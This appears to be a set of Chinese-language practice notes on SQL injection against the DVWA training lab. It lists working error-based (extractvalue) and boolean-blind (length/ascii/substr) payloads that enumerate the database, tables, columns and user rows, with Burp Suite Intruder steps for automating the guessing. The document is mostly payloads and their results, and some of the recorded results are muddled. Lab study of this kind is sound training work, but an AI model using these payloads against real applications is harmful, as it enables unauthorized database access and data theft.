爆库名
1' and extractvalue(1,concat(0x7e,database()));#
爆表数
1' and extractvalue(1,concat(0x7e,(select count(table_name) from information_schema.tables where table_schema='dvwa')))#
爆表名
1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='dvwa' limit 0,1)))#
爆列数
1' and extractvalue(1,concat(0x7e,(select count(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users')))#
爆列名
1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1)))#
爆列里信息
1' and extractvalue(1,concat(0x7e,(select user from users limit 0,1)));#
ascii码值 (33-126重点)
现在判断是字符型还是数字型
1
1’
1”
1 and 1=1 #
1 and 1=2 #
1' and 1=1 #
1' and 1=2 #
1' or '1' = '1 #
1' or '1' = '2 #
猜解数据库长度
1' and length(database())>10 #
1' and length(database())>5 #
1' and length(database())>3 #
1' and length(database())=4 #
证明数据库名字长度等于4
猜解数据库第一个字母 (ascii表33-126是键盘上的常用按键)
1' and ascii(substr(database(),1,1))>88 #
使用burp 抓包,将1添加$,然后该数值范围为0-4-1,33-126-1,得出字母分别为100,118,119,97对应的ascii表为d,v,w,a。
猜解表的数量
1' and (select count (table_name) from information_schema.tables where table_schema=database()) >10 #
1' and (select count (table_name) from information_schema.tables where table_schema=database()) =2 #
猜解第一个表名
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=88 #
使用bp抓包,并修改第三个1和88,使用集束炸弹将数值修改为0-5-1,33-126-1,
得出表名是guestbook
猜解第二个表名
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=88 #
使用bp抓包,并修改第三个1和88,使用集束炸弹将数值修改为0-5-1,33-126-1,
得出表名为users
爆users表里的列数
1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name= 'users') = 8 #
使用bp添加$8,修改数值为0-10-1
得出users表里有8个列
爆users表的字段长度
1' and length(substr((select column_name from information_schema.columns where table_schema=database() and table_name= 'users' limit 0,1),1))=10 #
使用bp添加$10,修改数值为0-10-1
users表中第一个字段长度为7
爆users表中第一个列名称
1' and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),1,1))=100 #
使用bp添加$1,$100修改数值为0-50-1,33-126-1
得出列名称为user_id
爆users表中第二个列名称
1' and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),1,1))=100 #
使用bp添加$1,$100修改数值为0-20-1,33-126-1
得出列名称为first_name
爆users表中first name列中的信息
1' and length(substr((select user from users limit 0,1),1))=7 #
使用bp添加$7修改数值为0-10,使用狙击手
得出first_name中有5行数据
爆users表中first_name列中每条信息的长度
1' and (select count(*) from users)= 20 #
使用bp添加$20修改数值为0-20,使用狙击手
得出users中有5行
爆users表中first_name列中每条信息的长度
1' and length(substr((select first_name from users limit 0,1),1))=1 #
使用bp添加$0,$1修改数值为0-20-1,0-20-1
得出长度分别为5,6,4,5,3
查出列中的信息
1' and ascii(substr((select first_name from users limit 0,1),1,1))=1 #
得出结果为admin
1' and ascii(substr((select first_name from users limit 1,1),1,1))=1 #
修改$1,$1
得出名字长度为6位,为Gordon